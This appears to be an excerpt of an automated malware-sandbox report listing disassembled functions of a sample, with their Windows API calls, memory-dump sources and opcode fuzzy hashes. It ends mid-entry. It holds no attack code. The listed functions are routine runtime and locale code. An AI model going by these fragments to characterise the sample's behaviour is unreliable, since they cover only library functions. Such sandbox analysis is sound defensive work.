                                                                                                                                                                                            Function 00363D20 Relevance: 9.2, APIs: 2, Strings: 3, Instructions: 415COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 0036453A
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                            • String ID: Te9$parse error$parse_error
                                                                                                                                                                                            • API String ID: 118556049-3911243356
                                                                                                                                                                                            • Opcode ID: cd491d59a42ad7085ded0d9962ea3466c12634c51bf9f925a583e7c6ee705a6a
                                                                                                                                                                                            • Instruction ID: bf8c078a37e4d4eb794dc7884e02d694831f2710fe498cf62e4381bfc5a4259d
                                                                                                                                                                                            • Opcode Fuzzy Hash: cd491d59a42ad7085ded0d9962ea3466c12634c51bf9f925a583e7c6ee705a6a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 75E1D271E102098FCB0ADFA8CC95BEDBBB5BF55300F14866DE406EB655EB34AA44CB50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00363E2C Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 370COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 0036453A
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Concurrency::cancel_current_task
                                                                                                                                                                                            • String ID: '$Te9$parse error$parse_error
                                                                                                                                                                                            • API String ID: 118556049-3974104043
                                                                                                                                                                                            • Opcode ID: c30190316d3d1cf5bbb6468100f6d8439fcee8189602978484b9f1cdb8250b04
                                                                                                                                                                                            • Instruction ID: 8077d3c17264f319d2d17430ae5cb7a4718654ec15d783c5f8d1d41248147fac
                                                                                                                                                                                            • Opcode Fuzzy Hash: c30190316d3d1cf5bbb6468100f6d8439fcee8189602978484b9f1cdb8250b04
                                                                                                                                                                                            • Instruction Fuzzy Hash: BFD10271D102088FDB0ADFA4CC95BEDBBB5FF15300F14866DE406AB696EB349A84CB50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0038D429 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,2000000B,0038D73B,00000002,00000000,?,?,?,0038D73B,?,00000000), ref: 0038D4C2
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,20001004,0038D73B,00000002,00000000,?,?,?,0038D73B,?,00000000), ref: 0038D4EB
                                                                                                                                                                                            • GetACP.KERNEL32(?,?,0038D73B,?,00000000), ref: 0038D500
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InfoLocale
                                                                                                                                                                                            • String ID: ACP$OCP
                                                                                                                                                                                            • API String ID: 2299586839-711371036
                                                                                                                                                                                            • Opcode ID: 644296267cd01ca5c47327e0ef595ccc6e004346d5dc08771a6ddc55750a1e4e
                                                                                                                                                                                            • Instruction ID: c74b9c4c11c3abd8040658105d682d79cf888bfc62646be8eed6e750aec1c238
                                                                                                                                                                                            • Opcode Fuzzy Hash: 644296267cd01ca5c47327e0ef595ccc6e004346d5dc08771a6ddc55750a1e4e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0E21B672600304ABDB33FF16D902AA773AAEB50B64B5784E4E90AD7195EB32ED41C350
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0038D605 Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 00386179: GetLastError.KERNEL32(00000000,?,00388639), ref: 0038617D
                                                                                                                                                                                              • Part of subcall function 00386179: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0038621F
                                                                                                                                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 0038D70D
                                                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 0038D74B
                                                                                                                                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 0038D75E
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0038D7A6
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 0038D7C1
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 415426439-0
                                                                                                                                                                                            • Opcode ID: 7aa7716298b577e2e602a53ad403f8d7254866cfacd38d864839d08b27cb1382
                                                                                                                                                                                            • Instruction ID: 86f688963be221b8ac216958bd9dbf6d49ed4898748856e69e0c8324fc5e2fab
                                                                                                                                                                                            • Opcode Fuzzy Hash: 7aa7716298b577e2e602a53ad403f8d7254866cfacd38d864839d08b27cb1382
                                                                                                                                                                                            • Instruction Fuzzy Hash: B8516C71A00309ABDF12FFA5DC45AAA77B8AF08700F5545AAF914EB191E770D904CB61
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0038CC79 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 256COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 00386179: GetLastError.KERNEL32(00000000,?,00388639), ref: 0038617D
                                                                                                                                                                                              • Part of subcall function 00386179: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0038621F
                                                                                                                                                                                            • GetACP.KERNEL32(?,?,?,?,?,?,00382EB1,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 0038CD38
                                                                                                                                                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00382EB1,?,?,?,00000055,?,-00000050,?,?), ref: 0038CD6F
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 0038CED4
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                                                                                                                            • String ID: utf8
                                                                                                                                                                                            • API String ID: 607553120-905460609
                                                                                                                                                                                            • Opcode ID: 97cd6fe6e3940835a09c951c63a5ed3e479d2e3fdf65f2113ac0b5e497619a6a
                                                                                                                                                                                            • Instruction ID: a73cc2c9e6d16c8a4fe92d911ce5947d588b738fa93f36e76736ef606ab0a75a
                                                                                                                                                                                            • Opcode Fuzzy Hash: 97cd6fe6e3940835a09c951c63a5ed3e479d2e3fdf65f2113ac0b5e497619a6a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A71F571620306AADB27BB35CC42EB7B7A8EF05700F1154AAF506DB182EB70E9448771
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00375363 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0037536F
                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 0037543B
                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0037545B
                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 00375465
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 254469556-0
                                                                                                                                                                                            • Opcode ID: 221485d903ef85c7460ca69f1be02310db1b41876c8639bdffe670fd721fb88b
                                                                                                                                                                                            • Instruction ID: c6e38105391923a556cee51604d24a95867057b4ebb56833a1ce9825d0c96522
                                                                                                                                                                                            • Opcode Fuzzy Hash: 221485d903ef85c7460ca69f1be02310db1b41876c8639bdffe670fd721fb88b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0C312BB5D0531C9BDB21DFA4D98A7CCBBB8AF04305F1041DAE40DAB250EB755A84CF44
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 0038D0A0 Relevance: 4.7, APIs: 3, Instructions: 205COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 00386179: GetLastError.KERNEL32(00000000,?,00388639), ref: 0038617D
                                                                                                                                                                                              • Part of subcall function 00386179: SetLastError.KERNEL32(00000000,00000000,00000000,00000006,000000FF), ref: 0038621F
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0038D0F4
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0038D13E
                                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0038D204
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: InfoLocale$ErrorLast
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 661929714-0
                                                                                                                                                                                            • Opcode ID: 05d9674c30013848ede2897331945cc1c5c947a902fba3f941836671de3d928a
                                                                                                                                                                                            • Instruction ID: 58d8433c373571b252fe355e4d12a48336ed16ef5f1006fb66a82ded28912cdf
                                                                                                                                                                                            • Opcode Fuzzy Hash: 05d9674c30013848ede2897331945cc1c5c947a902fba3f941836671de3d928a
                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E616D7150030B9FDB6AEF24CC86BAAB7A8EF04300F1545AAED05DA9C9E774D985CB50
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00380DCC Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00380EC4
                                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00380ECE
                                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(0037A655,?,?,?,?,?,00000000), ref: 00380EDB
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                                                                            • Opcode ID: 2f21faa6e9af2090dacbd0ddeb2782a362a769f543cefde7241d15338cb82a0e
                                                                                                                                                                                            • Instruction ID: 53005a647f0c0ceb384bd2a86bd6c5539f67ae9d8e967f368a7aaff5033b1c56
                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f21faa6e9af2090dacbd0ddeb2782a362a769f543cefde7241d15338cb82a0e
                                                                                                                                                                                            • Instruction Fuzzy Hash: 653106749413189BCB62DF24DD89B8DBBB8BF08310F1042DAE41CA7250EB749F858F44
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00376125 Relevance: 3.0, APIs: 2, Instructions: 15timeCOMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetSystemTimePreciseAsFileTime.KERNEL32(?,?,003758C4,0036F818,?,?,?,0036F818), ref: 0037613E
                                                                                                                                                                                            • GetSystemTimeAsFileTime.KERNEL32(0036F818,?,?,003758C4,0036F818,?,?,?,0036F818), ref: 00376142
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Time$FileSystem$Precise
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 743729956-0
                                                                                                                                                                                            • Opcode ID: 02c9b172606be1a8943cbaf732e0eb6a9b306b612f10698f8c852df91d5ea675
                                                                                                                                                                                            • Instruction ID: 6684e6301a3bf363818b9afcda49485ad23318dc98ff217ce94a287f93d8d9bd
                                                                                                                                                                                            • Opcode Fuzzy Hash: 02c9b172606be1a8943cbaf732e0eb6a9b306b612f10698f8c852df91d5ea675
                                                                                                                                                                                            • Instruction Fuzzy Hash: 68D02236502538978E132B84EC1B4DD7F1CEA44F62B000013F90D83221CB625C80CBD0
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 003619F0 Relevance: 2.7, Strings: 2, Instructions: 192COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID: `':$null
                                                                                                                                                                                            • API String ID: 0-721221276
                                                                                                                                                                                            • Opcode ID: c0adeaa7e679a3679bc34072b0b20a4776ebdc1e41f7317e4e4b81f332dc0464
                                                                                                                                                                                            • Instruction ID: ebf5cc2cb9e7b1c5dbc226ef3b02668196f7d81743cf4d962bae3cd6dce74cfe
                                                                                                                                                                                            • Opcode Fuzzy Hash: c0adeaa7e679a3679bc34072b0b20a4776ebdc1e41f7317e4e4b81f332dc0464
                                                                                                                                                                                            • Instruction Fuzzy Hash: D3517F30B405089BCB66EFA8D4527BDB3F5DB48310F04819EEC0F9FA82DB695E549785
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00368770 Relevance: 1.8, APIs: 1, Instructions: 343COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: ff0d522a6f133bc9199934d4daeddbe5df0a5973f64a4d671b88ad07d44cbba6
                                                                                                                                                                                            • Instruction ID: a2ef4fd90852d589e100a2fcf38f72cf32fb5faa7755bca9772d5180d48bcfcf
                                                                                                                                                                                            • Opcode Fuzzy Hash: ff0d522a6f133bc9199934d4daeddbe5df0a5973f64a4d671b88ad07d44cbba6
                                                                                                                                                                                            • Instruction Fuzzy Hash: DFD17A706187868FC705CF28C490A6AFBF0BF99304F548A1EF986D7251EB31E945CB92
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00367820 Relevance: 1.8, APIs: 1, Instructions: 340COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: b3f948393eee20e21903aebee207f46d055c9837d934603500b5b24bbbce203c
                                                                                                                                                                                            • Instruction ID: 147ce8d3746f7e0ed83356a726efe448da2f316bed36986756f2e74c80a366bb
                                                                                                                                                                                            • Opcode Fuzzy Hash: b3f948393eee20e21903aebee207f46d055c9837d934603500b5b24bbbce203c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 66D17B316187458FC709CF28C490A6AFBE0BF99304F448A2EF986D7351EB31E955CB92
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00367C30 Relevance: 1.8, APIs: 1, Instructions: 331COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 8770b712671c20177d005a1dc8890ad33a981f5954eb908072d93600e160e849
                                                                                                                                                                                            • Instruction ID: b6b5f43fd2a1512e0276360334e0d952004c9e203cd58770c578b362d71b71dd
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8770b712671c20177d005a1dc8890ad33a981f5954eb908072d93600e160e849
                                                                                                                                                                                            • Instruction Fuzzy Hash: F0D169306187868FC315CF28C450A6AF7F0BF99304F448A6EF986DB211EB71E955CB92
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00368B80 Relevance: 1.8, APIs: 1, Instructions: 320COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000000.00000002.2152269014.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                                                                                                                                            • Associated: 00000000.00000002.2152252733.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152294843.0000000000396000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152309281.00000000003A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000000.00000002.2152320066.00000000003A9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_350000_Gj8P0mbklo.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID:
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                            • Opcode ID: 6915b2739f48d16c264ec9ecf0865a17d6217eb1f6e47d358d97b2e5eb04990c
                                                                                                                                                                                            • Instruction ID: eaa2f376fc5054ffd74f2c85fbb9c350bbfee4f36e6616fc40e5d70d9b585354
                                                                                                                                                                                            • Opcode Fuzzy Hash: 6915b2739f48d16c264ec9ecf0865a17d6217eb1f6e47d358d97b2e5eb04990c
                                                                                                                                                                                            • Instruction Fuzzy Hash: 81C18E706187468FC705CF28C490A6AFBE0BF99304F448A2EF986D7251EB31E955CB92
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 00368030 Relevance: 1.8, APIs: 1, Instructions: 300COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::cancel_current_task.LIBCPMT ref: 003683C5
                                                                                                                                                                                            Memory Dump Source
